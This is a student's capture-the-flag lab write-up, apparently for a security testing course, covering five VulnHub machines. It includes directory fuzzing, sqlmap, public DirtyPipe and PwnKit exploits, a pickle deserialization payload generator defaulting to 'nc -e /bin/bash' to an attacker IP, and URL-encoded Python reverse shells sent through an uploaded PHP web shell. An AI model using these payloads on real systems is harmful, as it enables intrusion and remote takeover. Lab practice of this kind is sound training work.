Kiểm thử và đánh giá AT hệ thống TT

# Kiểm thử và đánh giá AT hệ thống TT # Lab 6: [LupinOne](https://www.hackingarticles.in/empire-lupinone-vulnhub-walkthrough/) - scan để tìm dải ip của máy chủ LupinOne bằng Ubuntu ![](https://i.imgur.com/Pdy6OHt.png) -> Ip server là 192.168.136.172 ![](https://i.imgur.com/W4Ulkiu.png) ![](https://i.imgur.com/HQZ5gBB.png) + nmap scan port và các endpoint của server ![](https://i.imgur.com/QqDPC8v.png) Hoặc có thể truy cập thẳng vào /robots.txt ![](https://i.imgur.com/ndGjKm7.png) + `/~myfile` ![](https://i.imgur.com/EGHqSu4.png) + `ffuf -w seclist/common.txt -u http://192.168.138.172/~FUZZ -mc 200,301,401` ![](https://i.imgur.com/wb4wKFN.png) ![](https://i.imgur.com/0sPf6mY.png) ![](https://i.imgur.com/OTKMylo.png) ![](https://i.imgur.com/gc0Acas.png) ![](https://i.imgur.com/CtHq3yp.png) ![](https://i.imgur.com/s0D3ShH.png) ![](https://i.imgur.com/nK8Cw6z.png) ![](https://i.imgur.com/cF6IdJm.png) => `3mp!r3{I_See_That_You_Manage_To_Get_My_Bunny}` ``` wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh ``` ![](https://i.imgur.com/MxGex6V.png) ``` chmod +x linpeas.sh ./linpeas.sh ``` ![](https://i.imgur.com/7qE1C4v.png) ![](https://i.imgur.com/ETDY3Z1.png) ![](https://i.imgur.com/FSROa1a.png) [CVE-2022-0847-DirtyPipe-Exploits](https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits) ``` git clone https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits cd CVE-2022-0847-DirtyPipe-Exploits chmod +x compile.sh ./compile.sh ``` ![](https://i.imgur.com/8bmxWTB.png) ![](https://i.imgur.com/9YXVqTR.png) ``` cat /root/root.txt ``` **3mp!r3{congratulations_you_manage_to_pwn_the_lupin1_box}** ---------- # Lab 7: [PHINEAS: 1](https://www.vulnhub.com/entry/phineas-1,674/) ![](https://i.imgur.com/hYp82X1.png) ![](https://i.imgur.com/xCTMM6n.png) ![](https://i.imgur.com/5NrvaY6.png) ![](https://i.imgur.com/wombrKO.png) ``` ffuf -u http://192.168.163.136/structure/FUZZ -w /tmp/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt -e .txt,.html,.php -fc 403 ``` ![](https://i.imgur.com/jhb3vZU.png) ![](https://i.imgur.com/HULJNzJ.png) ```http git clone https://github.com/padsalatushal/CVE-2018-16763 cd CVE-2018-16763 python3 -m pip install -r requirements.txt chmod +x exploit.py ./exploit.py -u http:///192.168.136.163/structure/index.php ``` ![](https://i.imgur.com/ls5bPEa.png) ![](https://i.imgur.com/QiBlOFR.png) Read database from source ![](https://i.imgur.com/rWtTcKl.png) -> username: anna password: H993hfkNNid5kk Connect using SSH ![](https://i.imgur.com/sJPPLpF.png) Read file `app.py` ![](https://i.imgur.com/cxqjgbt.png) -> param: awesome POC: https://gist.github.com/kriss-u/085569495cb930e398759c0cbf45e3b7 ```python #!/usr/bin/env python3 #poc_CVE2018-16763.py import pickle import sys import base64 DEFAULT_COMMAND = "nc -e /bin/bash 192.168.163.131 9999" COMMAND = sys.argv[1] if len(sys.argv) > 1 else DEFAULT_COMMAND class PickleRce(object): def __reduce__(self): import os return (os.system,(COMMAND,)) print(base64.b64encode(pickle.dumps(PickleRce())).decode('utf-8')) ``` ``` python3 poc_CVE2018-16763.py gASVPwAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjCRuYyAtZSAvYmluL2Jhc2ggMTkyLjE2OC4xNjMuMTM2IDQ0NDSUhZRSlC4= ``` Default Flask run in port 5000 ![](https://i.imgur.com/FGQdcKm.png) ![](https://i.imgur.com/sac9V2c.png) Post `awesome` data to server running on http://127.0.0.1:5000/haven ![](https://i.imgur.com/RItJV04.png) ![](https://i.imgur.com/pHQi1BB.png) ![](https://i.imgur.com/K8Tj1zn.png) -> Flag: `YW5uYW1hcmlhbmljb3NhbnRpdml2ZSE` ---- # Lab 8: [DarkHole2](https://www.vulnhub.com/entry/darkhole-2,740/) ![](https://i.imgur.com/pDaQ30E.jpg) ``` ffuf -u http://192.168.163.132/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e .txt,.html,.php ``` ![](https://i.imgur.com/n3W9Hyh.png) ![](https://i.imgur.com/K4bOuEy.png) ![](https://i.imgur.com/aMu7sN1.png) Using [git dumper](https://github.com/arthaud/git-dumper). A tool to dump a git repository from a website ``` pip install git-dumper ``` ![](https://i.imgur.com/34QdWpU.png) ![](https://i.imgur.com/0Vvhc9m.png) ``` email: lush@admin.com password: 321 ``` ![](https://i.imgur.com/rb40CVO.jpg) After login ![](https://i.imgur.com/Kj93Gpo.png) ![](https://i.imgur.com/fcJ3jm7.png) PHP Deobfuscator: https://www.unphp.net/decode/2b860fdd6a2eba03306e40a72bbcef50/ ``` sqlmap -u http://192.168.163.132/dashboard.php?id=1 --dbms=MySQL --cookie='PHPSESSID=0j7sc15m8gfijv6tu9j43k32oc' --dump ``` ![](https://i.imgur.com/KZhSpyf.png) ![](https://i.imgur.com/MtSCsch.png) ![](https://i.imgur.com/JjHQ6i1.png) ``` curl -Ls https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh > bash ``` ![](https://i.imgur.com/ucsgebx.png) ![](https://i.imgur.com/vYcjNJu.png) POC: https://github.com/berdav/CVE-2021-4034 ![](https://i.imgur.com/9yYSVCt.png) ![](https://i.imgur.com/VqtsbCK.png) ![](https://i.imgur.com/eFk0JhO.png) ![](https://i.imgur.com/r9vCOGc.png) ``` sudo python3 -c 'import pty; pty.spawn("/bin/bash")' ``` ![](https://i.imgur.com/qx4AvjU.png) ![](https://i.imgur.com/TkzNQhl.png) Flag: `DarkHole{'Legend'}` ----- # Lab 9: [DarkHole1](https://www.vulnhub.com/entry/darkhole-1,724/) ![](https://i.imgur.com/fxZ5rZv.png) ![](https://i.imgur.com/SnHoSLZ.jpg) Login Form: Sign up ![](https://i.imgur.com/aehjgp5.png) ``` username: test passwd: test ``` ![](https://i.imgur.com/ckMqtYH.png) ![](https://i.imgur.com/6pXRnZ1.png) Change password user test ![](https://i.imgur.com/AT7AE8N.png) userID admin maybe is 1. We can change by: ![](https://i.imgur.com/EUwOMoi.png) Upload file ![](https://i.imgur.com/yRB0Ghr.png) Not allow upload PHP file ![](https://i.imgur.com/QR8aKuR.png) Change to `phtml` success ![](https://i.imgur.com/uRZknqE.png) Access file ![](https://i.imgur.com/JapyCe9.png) Revershell: ```http python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.163.131",4444));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import%20pty;%20pty.spawn("sh")%27 ``` ![](https://i.imgur.com/OQOHX0Z.png) ![](https://i.imgur.com/dUKaT54.png) Password john : root123 ![](https://i.imgur.com/b3eioDI.png) Root privilege escalation ![](https://i.imgur.com/jjMdg1K.png) ![](https://i.imgur.com/CZR6Imt.png) -> Flag: `DarkHole{You_Can_DO_It}` ---- # Lab 10: [Prime 1](https://www.vulnhub.com/entry/prime-1,358/) ![](https://i.imgur.com/sxY1HpL.png) ![](https://i.imgur.com/J9LXZrA.png) ![](https://i.imgur.com/AC1Fzft.png) ![](https://i.imgur.com/lBfKMti.png) ![](https://i.imgur.com/Gc7vu3T.png) ![](https://i.imgur.com/pEpVlLb.png) ![](https://i.imgur.com/k2M9Sb4.png) ![](https://i.imgur.com/Zdui5zo.png) -> victor's password: `follow_the_ippsec` ![](https://i.imgur.com/uQoeb7W.png) ![](https://i.imgur.com/gi9jQ5H.png) ![](https://i.imgur.com/LSsEETN.png) ![](https://i.imgur.com/8IpAuCw.png) ![](https://i.imgur.com/3rxZtGJ.png) ``` cat /home/saket/user.txt af3c658dcf9d7190da3153519c003456 ``` ``` git clone https://github.com/berdav/CVE-2021-4034 ``` revershell ``` http://192.168.163.135/wordpress/wp-content/themes/twentynineteen/secret.php?0=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.163.131%22,4444));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import%20pty;%20pty.spawn(%22sh%22)%27 ```